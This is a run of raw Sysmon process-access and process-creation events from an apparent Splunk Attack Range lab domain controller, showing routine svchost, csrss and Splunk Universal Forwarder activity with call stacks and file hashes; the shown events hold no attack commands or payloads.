13:36:45.970{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004242Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:45.970{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004241Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:45.970{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004240Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:45.970{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004239Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:45.970{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004238Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:45.970{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004237Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:45.970{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004236Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:45.970{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004235Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:45.970{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EED-6005-E300-00000000A301}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004234Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:45.970{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EED-6005-E300-00000000A301}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004233Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:45.971{59A5CD1D-8EED-6005-E300-00000000A301}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004232Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:45.439{59A5CD1D-8EED-6005-E200-00000000A301}41084048C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004231Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:45.298{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EED-6005-E200-00000000A301}4108C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004230Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:45.298{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004229Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:45.298{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004228Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:45.298{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004227Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:45.298{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004226Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:45.298{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004225Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:45.298{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004224Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:45.298{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004223Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:45.298{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004222Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:45.298{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004221Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:45.298{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EED-6005-E200-00000000A301}4108C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004220Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:45.298{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EED-6005-E200-00000000A301}4108C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004219Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:45.299{59A5CD1D-8EED-6005-E200-00000000A301}4108C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004259Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:46.642{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EEE-6005-E400-00000000A301}880C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004258Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 